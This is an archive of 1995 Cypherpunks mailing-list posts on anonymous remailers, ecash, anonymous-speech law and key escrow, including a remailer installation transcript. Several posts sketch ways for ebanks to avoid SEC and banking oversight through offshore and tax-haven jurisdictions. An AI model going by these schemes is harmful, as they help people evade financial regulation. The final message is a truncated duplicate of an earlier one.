as the value of real cash is based on the possibility of converting it into
real things), a structure that operates outside the law makes that value
doubtful. A large-scale rollout of ecash for the average Netscape user (and
the people that service them) is going to need all the legitimacy it can
muster.

Perhaps, though, we can start small, and allow the forces of nature (greed,
envy and, with a bit of luck, sloth) to take their course and scale a small
scheme into a thriving e-economy.

What I have in mind is a service that provides estamps (you knew there had
to be an 'e' in there somewhere, didn't you) for use with remailers. Jo
Anonymous buys stamps, sticks them on her messages, and the anon-remailers
collect them. The remailer ops then get to cash the stamps in for actual
money, so they can pay their ISPs and lawyers.

At the heart of the scheme is a genuine (micro) ebank [a uebank?]. But, to
avoid problems with offering securities to the public (and the SEC hassles
etc), the ebank only sells estamps (little bits of ecash) to estamp-
vendors. The estamp-vendors sell the stamps (with a mark-up?) to the public.
[Perhaps using this new Netscape/Mastercard tie-in.] Because the estamp-
vendors are only selling stamps (you can tell by the beautiful stamp-like
gif-icons the vendor's Web page uses...) the SEC doesn't become involved.
[I'm relying on the fact that the numbers involved are really small, and
that the estamps *are* being sold for the purposes of postage. Perhaps 
the ebank and the vendor should be based off shore...]

This scheme breaks the credibility issue into two -- a large number of
people (anonymous remailer users) have to be convinced of something
relatively trivial (that the remialer will accept the stamps); a small
number of people (anonymous remailer operators) have to be convinced of
something relatively important (that the stamps are exchangeable for cash).
If the remailer operators are sufficiently involved in the scheme, this
should work.

One type of scalability comes when EITHER

A. Someone sets up as a Data Haven token vendor (the tokens being bought
from the ebank as slightly larger bits of ecash), and data haven operators
start to accept the Tokens, in the knowledge they can swap them for real
money;

OR

B. Data Haven operators start to accept estamps for their services, because
they can swap them for cash;

OR both.

[The first scenario obviously disguises the appearance of ecash as a medium
of exchange for a bit longer.]

Another type of scalability comes when other people start uebanks, which
then issue their own estamps/tokens/ecash to estamp/token vendors. If the 
new uebanks are as (provably) secure as the original(s), the uebanks could
agree to clear each others' ecash and settle up at the end of the day (or
some global equivalent - eg 12am GMT) using some kind of netting system.

As long as everyone played nice at the beginning (all the remailer operators
declared their estamp income etc ;-) the uebanks could go legit: and by 
backing their submissions to regulators with a proven record of service
(no need to stress that the remailers were *anonymous*), by wearing Al Gore
t-shirts and garbling about the I-way and electronic town halls, and by not
letting Tim May and his contract killers near the place, it might just work.

On the other hand, if the system is working well enough, there may be no
need to go legit. (Although if I was an ebank operator I would be wary about
entering into netting arrangements with an ebank the SEC etc could close
down). [But is netting needed with online clearing? Perhaps this would
only be useful across currencies...] With the ebanks in appropriate 
jurisdictions, operating in grey rather than obviously black areas (it
is not so much that this stuff is being offered to the public as that the
public is going out to *find* this stuff), with a proven track record in 
ponying up the cash, and with the approval of really cool people who get on 
the cover of Wired, Robin Public may not *need* any more assurance to par-
ticipate in the e-economy.

What R.P. *will* need is products. Most of the attempts at net-commerce I've
seen concentrate on offering things that can be delivered to people, either
physically (so that the Compuserve Electronic Mall is basically a mail order
catalogue) or electronically (hence the rather sketchy descriptions of 
anonymous markets, usually falling back on the idea that, because this is
the Information Age, consulting is the root of all value...), to be consumed
now (this tin of coffee, that movie-on-demand, the other set of nanotech
plans).

But of course a lot of people (not, unfortunately, myself :-) have
significant amounts of property that they do not consume right away. The
possibility of anonymous investment (through eg anon corps) offers huge 
scope for the development of the e-economy. [I'll mention one statistic -- 
according to tax haven experts (Ginsberg, Spitz), in 1989 50% of all money
processed internationally goes through tax havens.] After all, a capitalist
economy (even an anarcho-capitalist economy) is built by capitalists, not
wage slaves.

More later (unless you plead real hard...)

Cheers,

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 21 Jan 95 10:47:17 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Supreme Court on Anonymous Bills
In-Reply-To: <Pine.3.89.9501211257.D14968-0100000@lia.bga.com>
Message-ID: <199501211846.KAA11212@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> There can be little question that any attacks on remailers and civilian
> strong crypto will face challenges on the basis of Free Speech and Equal
> Protection.  The question is: can the state show compelling interest?  I
> believe that it can.  Anonymous agents, by their very nature, are immune
> from state restraint.  Since our entire legal system centers around state
> restraint, I believe that Free Speech and Equal Protection will fall to the
> four horsemen.

But mail and messages from "foreigners" is also "immune from state
restraint," and yet we haven't seen either a ban on mail from outside
the U.S. or a requirement that such mail be inspected, identified,
etc.

(I'm not sure if your line "our entire legal system centers around
state restraint" refers to state constraint of citizens, as you seem
to imply in your conclusion, or constraint _of_ the state, as the
Constitution seems to imply.)

Likewise, if I receive a letter, open it, and find a request to remail
it to another address, isn't this equivalent to our remailers? Does
this imply a compelling State need to open all mail?

Does the plotting of various crimes in private homes imply a
compelling State need to place microphones and video cameras in such
places?

Clearly not, so I don't think the privacy of e-mail will soon be
breached just because there are some abuses in some people's minds.

> There is the general question of political speech.  Unfortunately, there is
> little anonymous _US_ political speech.  Furthermore, sedition is a crime,
....
> I believe, therefore, that both the court and the dissent bode poorly for
> anonymous encrypted mail.

But anonymous handbills are quite common, posted all over the place
here in my home town, and the Supreme Court ruled quite properly that
identities are not required for speech. Likewise, radio call it shows
are dominated by anonymous call-ins.

Ditto for "Name Witheld by Request" letters to the editor, etc.

Lots of speech is not anonymous, because Congresscritters are
identified, because Rush Limbaugh obviously _wants_ his name
publicized, because I want my name attached to my views, etc. But not
because there's any law saying political speech cannot be anonymous.

Quite the contrary.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 21 Jan 95 15:40:55 PST
To: cypherpunks@toad.com
Subject: Locksmith's Guild wants limit on free speech
Message-ID: <199501211859.KAA12413@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is just an informal pointer, as I don't have the energy right now
to track down quotes, official positions, etc.

Check out comp.org.eff.talk for discussion of how "professional
locksmiths" are angry that "amateur locksmiths" (unlicensed, not real
members of the Brotherhood) are using the Net to disseminate and
discuss the Secret and Most Arcane Knowledge of the Guild.

And alt.locksmithing is carrying the stuff.

This is just one of several recent examples where a controversy is
developing. 

I have often likened the end of the medieval guilds to our current
situation. In 1300 A.D., the "Blacksmith's Guild" owned and controlled
the knowledge of blacksmithing, enforced by the Crown. Apprentices
were Initiates, and I have little doubt that attempts to "steal"
this knowledge were dealt with harshly, probably fatally.

This "intellectual property law" of its time was rendered moot when
books became economical. The first books published after Gutenberg
were religious in nature--Bibles and hymnals, etc. Then came "How To"
books, the destroyers of the Guilds.

Crypto and remailers are going to do the same thing to today's
versions of guilds, what we call "licensed professions."

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Sat, 21 Jan 95 09:30:25 PST
To: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211637.IAA00183@tower.stc.housing.washington.edu>
Message-ID: <199501211728.LAA04757@jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 21 Jan 95 10:17:49 PST
To: cypherpunks@toad.com
Subject: Supreme Court on Anonymous Bills
Message-ID: <Pine.3.89.9501211257.D14968-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
$.02 (fiat) on Talley v California  (recently posted here)
 
It is important to note that this court is expected to significantly
reverse some of the landmark cases from the Warren era.  We should,
therefore, to look to the dissent at least as much as to the court.
 
There can be little question that any attacks on remailers and civilian
strong crypto will face challenges on the basis of Free Speech and Equal
Protection.  The question is: can the state show compelling interest?  I
believe that it can.  Anonymous agents, by their very nature, are immune
from state restraint.  Since our entire legal system centers around state
restraint, I believe that Free Speech and Equal Protection will fall to the
four horsemen.
 
When we consider the decision, we note that one of the main reasons for
voiding the ordinance on its face was that there were other remedies to the
problems that the ordinance claimed to address.  No such other remedies
will exist in our case, that being part of the point of our systems.
Considering the dissent, we see even more room, with the question of Equal
Protection might not be extended on the basis that only electronic
communications were hampered.
 
There is the general question of political speech.  Unfortunately, there is
little anonymous _US_ political speech.  Furthermore, sedition is a crime,
and if the Founding Fathers printed the same things against our government
that they did against England (they could do more), they would face a
number of criminal charges.
 
 
I believe, therefore, that both the court and the dissent bode poorly for
anonymous encrypted mail.
 
 
But these are not the only arguments we have.  We have the questions of
Enforcablity, Distinguishability, Privacy, and the Right to Bear Arms.
One may argue with some force that it may be impossible to determine if a
person is sending and receiving information (and requests for information)
directly, or if they are acting as an anonymizing agent.  One may argue
with great force this difficulty, combined with the nature of the InterNet,
would make general enforcement impossible--leading to the same type of
failure as the Prohibition.  One may argue forcably that the tools
necessary to allow anymous encrypted traffic are the tools necessary to
preserve the barest elements of privacy.  Finally, since strong crypto has
been ITAR limited, one may argue that the tools required are militia-type
weapons, and as such, protected Arms.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyFKXnmgMs8UcStNAQFU+Af/SwmEoH2g/jZ1CtIRWevWkDQRl6Nnz1xe
j8yyMtvrz86cshfD6hBYjCZ+wcihmCXM7NxuHdrbaXihTuCRspJdTheD9xUAr4sk
qhqXlj4PqRVThg5FioD5/miuyLO6osJ02DfckpaWk0uJf6OBC9BIiOCzXnDVFaIh
dXNfEq4pjkJPFxSR2UU7ru4EUrAKRT5keV2cZ8QjMeeQ5YksveTIO6GeStzJjAJr
GQKSzdGF0qoauKsexHvaMDlbARhUEPx7vqufRWUsejkwDW73STZFBoFabcLpaJRs
9KwsSzdYFWlxtDlCpUIRFRAuxRlKCedOpEKRIYfIZy2bWSqqDbCz5A==
=sxi2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 21 Jan 95 05:11:27 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <FR69yc1w165w@vox.xs4all.nl>
Message-ID: <1995Jan21.043051.5142@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <FR69yc1w165w@vox.xs4all.nl> usura@vox.xs4all.nl (Alex de Joode) writes:
>jalicqui@prairienet.org (Jeff Licquia) writes:
>
>: Would it be better if you didn't have to dedicate your box to Linux, but
>: just ran it every so often when you weren't playing with Codewright?  If you
>: had some store-and-forward mail system (like UUCP or Fido), you wouldn't
>: need to say goodbye to DOS/Windows.
>
>Patrick Oonk <kafka@xs4all.nl> has written a remailer for Waffle,
>(wich is an UUCP system), I use that for vox.xs4ll.nl . Is works
>under DOS. 

I wouldn't mind hosting a remailer, but I am two UUCP hops off the net.
Does someone want to give me a San Jose area UUCP account directly to an
internet system?  An MX record holder would be nice.  My current domain
master is in Dallas, so mail to my machine actually goes through 4 UUCP
hops before it gets to me.  I want to get my own domain and get closer to
the net.

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:38:22 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Remailer In a Box available for beta testing
In-Reply-To: <X2C8lKjqRWmA077yn@mirage.skypoint.com>
Message-ID: <199501212041.MAA08262@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One minor question, is it possible to set it up so that it is not a final
> hop remailer. In other words the remailer is set up to pass its mail on to
> another remailer which is the final destination (preferably non-U.S.) If
> so, I'm in. I've already got my account on c2 doing three things, what's
> one more. If we could make this possible, it could really propagate
> remailers as it removes some of the liability from those who can't afford
> it.

	Yes. That's one of the questions the installation asks you.  I
should post a transcript of the installation to the list to show how
easy it is..

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 21 Jan 95 03:52:49 PST
To: cypherpunks@toad.com
Subject: Re: Netherlands crypto ban?
Message-ID: <199501211152.AA05246@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <gate.HRP0yc1w165w@dxm.ernet.in> you stated:

: What's the update on the move to ban private crypto in Holland? 
: Last I remember there were trial balloons, but nothing happened.

The proposed ban came from the former fundamentalist christian led
department of justice. Since the elections the political landscape
has been changed, the christian democratic party has been removed,
we now have Liberals (something like Republicans in the US :) ),
Socialists and Social Democrats in power. 

Law Enforcement has come under public scrutiny, since special police
teams used unlawful tactics to get criminal organizations out of 
their business. They broke into Warehouses to see if narcotics were
depostid there (without a warrant), they made up reports and lied in
court. 

The new head of the justice department, already has dropped some 
policies that were in place, and she just announced that due to the
rise in competence of the LEA the rights a suspect has also have to be
raised in order to compensate it. She swiftly killed of any opposition
the LEA had against that proposal. 

In my opinion, The Netherlands will not adopt a crypto policy on their
own, the'll do it if the EC proposes such a "thing". 

--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:38:11 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501211711.JAA13370@largo.remailer.net>
Message-ID: <199501212055.MAA09018@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Now setting up new domain names, while pretty easy, requires the
> cooperation of DNS operators.  Typically these connections have been
> informal and a low barrier to entry but only if you know somebody who
> does domain names.  DNS operation is not yet a separate service to
> buy, but I suspect it will become so.  In the meanwhile the offers of
> DNS provision by John and Strick are welcome.
> 

	I sell DNS service as well. See
http://www.c2.org/services/DNS_MX.html

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@tis.com>
Date: Sat, 21 Jan 95 10:34:47 PST
To: eric@remailer.net
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501202154.NAA09818@comsec.com>
Message-ID: <9501211806.AA20473@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 18 Jan 1995 19:38:54 -0800
>From: eric@remailer.net (Eric Hughes)
>
>   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
>
>   Safe deposit boxes, by virtue of their accessibility to law enforcement,
>   are subject to search and seizure under court order and are sealed
>   in certain cases (probate). This makes them likely to be the first place
>   to look when the Feds decide that we can't have keys anymore. 
>
>I am not designing systems for the paranoid fantasy of an inspection
>of all safety deposit boxes by government agents in search of
>contraband.
>
>I am interested in designing systems which will fit into business as
>usual, that are inconspicuous by their prevalance, and which will be a
>part of ordinary and usual protection of data by cryptographic means.

On the less paranoid side of this, you might check out TIS's Data Recovery
Center plans.  ftp://ftp.tis.com/pub/crypto/drc/ and below.
That location will have some code for interfacing to the prototype DRC in a
week or two.  Send me e-mail if you want to be on the mailing list for
notification of code availability/updates.


On the more paranoid side of this, in spite of Steve Walker's relish over
the fact that TIS's CKE (Commercial Key Escrow -- his name for the DRC
work) keeps keys out of government hands, except in cases of actual search
warrant, it looks (according to one privacy-advocate lawyer I discussed
this with) as if access can be gained with a mere subpoena -- and,
according to Scott Charney (of Justice Dept., if I remember correctly) the
currnet view is that if you voluntarily give a copy of your key to your
employer, you've abandoned your presumption of privacy and that relieves
the gov't of getting a search warrant (and maybe even subpoenna).


 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 21 Jan 95 04:09:24 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
Message-ID: <199501211209.AA07362@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


: I guess it'd be possible to treat remailers as disposable - when one
: had pissed off enough people, it could be abandoned - but this lack
: of long-term reliability seems poor.

The enrty point of a remailer could be "fixed", the exit point is where
the heat is on.

 - The entry point of a remailer is entry@remail.org, 

 - entry@remail.org has a forward file to: batch@remail.org

 - batch@remail.org does the actual remailing, since remail.org has
   installed some sort of MX'ing all messages that leave batch@remail.org
   will advertise themself as nobody@expendable.org .

 - If you "loose" expendable.org, you simple set up a new account with
   MX'ing, the remailer-users will only notice the change in exit-header,
   the enrty-point of that remailer is still entry@remail.org

Ofcource you can make this as complicated as you like. :)


Regards,
--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 21 Jan 95 15:40:23 PST
To: cypherpunks@toad.com
Subject: SysLaw and DigiCash
In-Reply-To: <VH6D1c2w165w@dxm.ernet.in>
Message-ID: <199501211906.OAA02426@tuatora.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rishab Aiyer Ghosh writes:
 > > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
 > 
 > No, I don't think he's a lawyer, but he wrote SysLaw which is widely hyped
 > as _the_ law book for BBS sysops. It's actually not that good - the EFF
 > recommends another one the name of which I've forgotten. 

I just picked up a copy of "Cyberspace and the Law" -- when I'm
through with it, I'll post a review. It looks to be a nice, broad
survey, but it looks suspiciously thin for a book on law :-)

While I'm posting, have I missed any good rants from folks who've had
a crack at the DigiCash beta test? I had a few criticisms of the end
result, but I'd rather not introduce further redundancy.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous@c2.org (Q Mixmaster Remailer)
Date: Sat, 21 Jan 95 15:35:08 PST
Subject: Re: Why emoney?  Why not a web of debt?
In-Reply-To: <199501210224.PAA22017@iconz.co.nz>
Message-ID: <199501212207.OAA12068@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sat, 21 Jan 1995 15:18:48 +1300
> From: davidm@iconz.co.nz (David Murray)
> 
> But of course, since ecash is worth only what you can get for it, the web of
> trust model, since it reflects what people will give for it, seems to
> reflect that underlying value much better.

  Oh... Nice...  I hadn't thought of that...

> The best way to underpin the value of ecash is for the issuer to (credibly)
> undertake to convert it into real money.

  And since I would only make the promise to the few people that I am
connected to in the debt-trust web, this is doable.  I doubt I could
convince all of you that I was good for $10, but I bet there are a few
readers on this list that I *could* convince.  They would be able to
convince a few others that _they_ are worth $10, etc.

  This system might even dodge the laws governing banking in various
jurisdictions ... though I doubt it.  It quacks, waddles, and water
runs off its back...

  Noyb





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 21 Jan 95 15:41:17 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <ab470c4102021004ffbf@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 01/20/95, Rhys Kyraden wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Okay. Here's my 2-bits.
>I run on the MacOS, but how hard could it be to port this code?

If you are talking about remailer code, rather, I think.  The mac doesn't
have a built in mail system, like unix systems generally do, which you kind
of need.    First you've got to get a hold of a mail system for the MacOS,
ideally not POPMail like Eudora, but actual receiving mail directly to your
mac, and then you've got to modify it to do remailing.  And that
modification isn't going to be nearly as easy as in the world of unix with
it's .forward files and /etc configuration files that let you pretty much
direct output wherever you want.    Basically, the amount of code you are
going to have to be writing from scratch is going to outweigh any "porting"
you are able to do with salvagable code.

On the other hand, you could base a remailer on Eudora.  Which means that
people would right to your normal mail account with mail-to-be-remailed,
and by means of some header lines distinguish the mail to be remailed.
Eudora can filter mail according to header lines.  And Eudora is
applescriptable, and can call an external applescript (or actual binary
executable program, if it does apple events. Which isn't trivial), and tell
it new mail has arrived to be dealt with.  Theoretically the external
program could even check the body of the message for a
::
Request Remailing-To:
So they wouldn't need to put anything special in the header, like they
don't need to with current remailers, even ones that run out of people's
normal shell accounts.

Theoretically, you could do that. But it would be rather unreliable, and
slow.  And if there was a lot of remailer traffic, it would get in the way
of your normal email.  I'm not sure it's worth putting in the amount of
effort neccesary for what you are going to get.  On the other hand, the
amount of effort neccesary would be much much less then writing remailer
code which worked with a mac mail system instead of POP mail, as discussed
above. I dunno.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Sat, 21 Jan 95 15:34:52 PST
To: cypherpunks@toad.com
Subject: AA BBS report
Message-ID: <9501211449.1.20646@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been keeping the net up on the AA BBS case since it started
last year.  Latest news (1/21/95) is that bail during appeal was
denied by the Sixth Circuit, and that Robert is to report to federal 
prison Feb. 8, in Springfield, MO to serve 3 years, one month.  I have 
no doubt that picking a place that far from his home and family was 
done on purpose as part of the punishment.  

Question for Mike Godwin:

Who pays transport from Springfield back to Utah so Robert can be 
present for the bogus kiddy porn trial in a few months?  Also being in 
prison will make it nearly impossible for him to prepare the .gif 
files his lawyer wants to present in his defense. 
  
They set the date (July 12) and place (Dublin, CA) for Carleen 
(Robert's wife).  She is to serve 2 years, 2 months.  I think the 
reason they are letting her start later is so she can be present when 
their oldest son graduates from high school.

AA BBS is still up, and may well stay up for the whole time Robert is 
in prison.  He has no other way to support his family or pay for legal 
defense.  Also, outside of western TN, OK, Utah, and other backwards 
places, what he is selling is legal--even protected under the First 
Amendment.  (Though some of it *is* kinda gross :-) ) 

AA BBS is up to about 25,000 files.  There is a good chance that they 
will be available through the internet at some point.

Trying to control information in the network age is about as sucessful 
as pissing into the wind.  

Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:34:10 PST
To: cypherpunks@toad.com
Subject: Remailer in a Box transcript
Message-ID: <199501212305.PAA14235@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The remailer created with the following transcript was created
for test purposes only. It is not to be used as a remailer.

infinity:infinity/rtest 3:02pm [10] > /usr/local/lib/boxed-remailer/install_remail 
Installation version 1.1
Making remail dir
Preparing forward file
You have the option of running a hidden remailer. If you are running
a hidden remailer mail to your remailer gets auto-forwarded to another
remailer where it is processed. That way your remailer is less likely
to come under attack because no one gets anonymous mail directly
from your remailer.
Would you like to run a 'hidden' remailer? [N]/y n
Your personal address would be a good thing to put in Complaints-To:
What should be put in the Complaints-To: header? Remailer Operator <sameer@c2.org>
Sending anon mail to self in a self-test
Remailer test complete
Would you like to subscribe to the remailer-operators@c2.org list? [Y]/n n
Ok.. done creating the anonymous remailer
Your old .forward file (if it existed) is now in .forward.0
Run "remailer_remove" (It will be installed in /home/infinity/rtest/bin)
To erase the remailer and restore your old .forward file
Installing remailer_remove in /home/infinity/rtest/bin
Now you have to create a PGP key for the remailer
Make sure you choose a key appropriate to a remailer
"Anon Remailer <rtest@c2.org>" would make a good keyid.
Please choose a key length of less than 1024 bits. Otherwise
the remailer will produce too much load on the system.
Hit return:
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1995/01/21 23:03 GMT
Pick your RSA key size:
    1)   512 bits- Low commercial grade, fast but less secure
    2)   768 bits- High commercial grade, medium speed, good security
    3)  1024 bits- "Military" grade, slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 1
Generating an RSA key with a 512-bit modulus.

You need a user ID for your public key.  The desired form for this
user ID is your name, followed by your E-mail address enclosed in
<angle brackets>, if you have an E-mail address.
For example:  John Q. Smith <12345.6789@compuserve.com>
Enter a user ID for your public key: 
Anon Remailer <rtest@c2.org>

You need a pass phrase to protect your RSA secret key.
Your pass phrase can be any sentence or phrase and may have many
words, spaces, punctuation, or any other printable characters.

Enter pass phrase: 
Enter same pass phrase again: 
Note that key generation is a lengthy process.

We need to generate 464 random bits.  This is done by measuring the
time intervals between your keystrokes.  Please enter some random text
on your keyboard until you hear the beep:
   0 * -Enough, thank you.
...**** .**** 
Key generation completed.
What did you name your remailer? Anon Remailer <rtest@c2.org>
What was the passphrase you chose? key
Running a self-test of PGP
Ran self-test of PGP
**************************************************
**************************************************
VERY IMPORTANT DO NOT ANSWER THIS QUESTION LIGHTLY
**************************************************
**************************************************
        Would you like to send the key that you generated for the
anonymous remailer sent to the remailer operators list? This means
that your remailer will be publically announced to the world. Make
sure that the UserID you chose is of a form reasonable for a remailer,
such as "Joe's Remailer <joe@c2.org>", or things could be a bit
messy.  Do not answer this question lightly.
Would you like to send your key to the list? [N]/y n
infinity:infinity/rtest 3:03pm [11] > 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Fri, 20 Jan 95 18:25:38 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501210224.PAA22017@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
>>  But electronic computers are good at checking out these kinds of
>>chains automatically.  Suppose there were a web of debt-trust.  Each
>>person would indicate the other people who's iou's they will accept
>>(and the amount they would be willing to take).
>
>Certainly, that's what money is after all. Pretty much.  But how are you
>going to transfer these IOUs electronically in a way that is relatively
>fraud-proof?  Digital money.  Ecash. [...]
> And another way to look at it is that you are just proposing an
>ecash system where every person issues their own ecash, instead of just a
>few central banks doing it.

The question of how to value ecash issued by different entities of varied
credit-worthiness is an interesting one. I had been thinking along the lines
of one or more centralised (but independent) credit rating agencies (a la
Standard and Poors or Moodys) that one would subscribe to. Then you would
value the various edollars in terms of their credit rating -- so you might
sell something for $4 of CyberCash (NA) BV ecash, or $5 of FliBiNite NL 
ecash and so on.

But of course, since ecash is worth only what you can get for it, the web of
trust model, since it reflects what people will give for it, seems to
reflect that underlying value much better.

The best way to underpin the value of ecash is for the issuer to (credibly)
undertake to convert it into real money. This gets around the problem of 
no one on the net making enough things you want: the old 'you can't eat
cyberspace' saw. McDonalds may not accept ecash, but if a simple trip to the
relevant ebank's Web page can put the price of a Big Mac in your real-money
account, that is only a timing problem.

[Of course, you have to come out from behind the anonymous ecash shield to 
do that, but that is a problem of being a real person. If you want to keep
your wealth anonymous, don't buy a flash car and the latest Monet to go
on sale -- invest it in an anonymous corporation.]

An ebank along these lines could be set up reasonably cheaply (apart from
the technical hurdles ;-), and could easily scale up as needed, and migrate
to safer (taxhaven/banking secrecy) jurisdictions when turnover etc
warranted it.

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:48:45 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> There can be little question that any attacks on remailers and civilian
> strong crypto will face challenges on the basis of Free Speech and Equal
> Protection.  The question is: can the state show compelling interest?  I
> believe that it can.  Anonymous agents, by their very nature, are immune
> from state restraint.  Since our entire legal system centers around state
> restraint, I believe that Free Speech and Equal Protection will fall to the
> four horsemen.

But mail and messages from "foreigners" is also "immune from state
restraint," and yet we haven't seen either a ban on mail from outside
the U.S. or a requirement that such mail be inspected, identified,
etc.

(I'm not sure if your line "our entire legal system centers around
state restraint" refers to state constraint of citizens, as you seem
to imply in your conclusion, or constraint _of_ the state, as the
Constitution seems to imply.)

Likewise, if I receive a letter, open it, and find a request to remail
it to another address, isn't this equivalent to our remailers? Does
this imply a compelling State need to open all mail?

Does the plotting of various crimes in private homes imply a
compelling State need to place microphones and video cameras in such
places?

Clearly not, so I don't think the privacy of e-mail will soon be
breached just because there are some abuses in some people's minds.

> There is the general question of political speech.  Unfortunately, there is
